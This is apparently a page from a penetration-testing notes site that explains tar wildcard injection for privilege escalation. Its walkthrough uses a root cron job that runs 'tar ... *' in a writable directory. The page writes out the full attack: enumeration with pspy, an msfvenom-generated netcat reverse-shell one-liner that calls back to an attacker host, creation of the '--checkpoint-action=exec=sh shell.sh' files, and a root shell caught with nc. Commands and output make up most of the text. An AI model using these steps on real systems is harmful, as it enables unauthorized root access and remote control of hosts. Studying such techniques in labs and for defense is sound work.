Wildcard Injection

Concept

Wildcard injection is a privilege escalation technique that abuses how shell wildcards (*) expand to filenames. If a privileged script (like a cron job) runs a command such as:

tar -zxf file.tar.gz *

...and we control the directory it's run in, we can create files with names like:

--checkpoint=1
--checkpoint-action=exec=sh shell.sh

These are interpreted by tar as command-line options, not regular files. This lets us inject malicious behavior — like running our own script as root — when the privileged tar command executes.

[ You control a writable dir ] 
         ↓
[ Cron runs: tar -zxf backup.tar.gz * ]
         ↓
[ You create fake files named as tar options ]
         ↓
* expands to:
    --checkpoint=1
    --checkpoint-action=exec=sh shell.sh
         ↓
[ tar executes your shell.sh as root ]

Example

We can use pspy or manually enumerate the target host:

# Enumerate running processes
$ ./pspy
...
2025/05/24 20:46:01 CMD: UID=0     PID=30275  | /bin/bash -c cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

# Manually enumerate cron jobs
$ cat /etc/cron.d/2minutes
...
*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

The 2minutes cronjob runs every two minutes as root and extracts the backup.tar.gz tarball from the /tmp directory into the /opt/admin directory using a wildcard (*). If we have access on the target directory (/opt/admin) we can perform a wildcard injection:

# Check the target directory's permissions
$ ls -ld /opt/admin
drwxr-xr-x 2 cassie cassie 4096 Nov  2  2022 /opt/admin

# Generate a reverse shell payload command on the attacking host
$  msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.X.154 LPORT=443 R
...
mkfifo /tmp/bhksuw; nc 192.168.X.154 443 0</tmp/bhksuw | /bin/sh >/tmp/bhksuw 2>&1; rm /tmp/bhksuw

In order for this to work, we must create both the --checkpoint files and the payload script (shell.sh) within the target directory (/opt/admin) before the cron job runs. This makes the * expand to those filenames, effectively injecting the checkpoint options into tar:

# Move into the target directory
$ cd /opt/admin

# Create the reverse shell script
$ echo "mkfifo /tmp/bhksuw; nc 192.168.X.154 443 0</tmp/bhksuw | /bin/bash >/tmp/bhksuw 2>&1; rm /tmp/bhksuw" > shell.sh

# Assing execute permissions to the script
$ chmod +x shell.sh

# Create a checkpoint the executes the script
$ touch -- "--checkpoint-action=exec=sh shell.sh"

# Create the checkpoint trigger
$ touch -- "--checkpoint=1"

# Create an empty tarball within the /tmp directory
$ tar -czf /tmp/backup.tar.gz --files-from=/dev/null

# Confirm that everything is in place
$ ls -l
total 4
-rw-r--r-- 1 cassie cassie   0 May 25 09:35 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie   0 May 25 09:35 --checkpoint=1
-rwxr-xr-x 1 cassie cassie 102 May 25 09:35 shell.sh

$ ls -l /tmp/back*
ls -l /tmp/back*
-rw-r--r-- 1 cassie cassie 45 May 25 09:44 /tmp/backup.tar.gz

After two minutes:

# Catch the reverse shell
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.X.154] from (UNKNOWN) [192.168.X.157] 44664
id
uid=0(root) gid=0(root) groups=0(root)

PreviousScreen NextTraffic Capture

Last updated 1 month ago

Was this helpful?